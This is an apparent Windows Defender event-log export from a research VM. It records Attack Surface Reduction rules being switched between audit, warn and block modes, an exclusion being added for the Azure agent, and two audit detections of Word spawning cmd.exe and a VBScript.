New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1864
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1863
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1862
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1861
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1860
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1859
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1858
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1857
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1856
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1855
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1854
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1853
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1852
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1851
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1850
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1849
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1848
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1847
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1846
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1845
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1844
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1843
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1842
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1841
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1840
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1839
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1838
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1837
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1836
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/16/2023 04:39:37 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1833
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyPerRuleExclusions\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = C:\WindowsAzure\Packages\WaAppAgent.exe
11/16/2023 04:38:59 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1832
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyExclusions\C:\WindowsAzure\Packages\WaAppAgent.exe = 0x0
11/16/2023 04:24:09 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1122
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1829
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T16:24:09.858Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: cmd.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 04:24:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1122
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1828
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-16T16:24:01.387Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1827
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1826
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1825
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1824
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1823
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1822
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
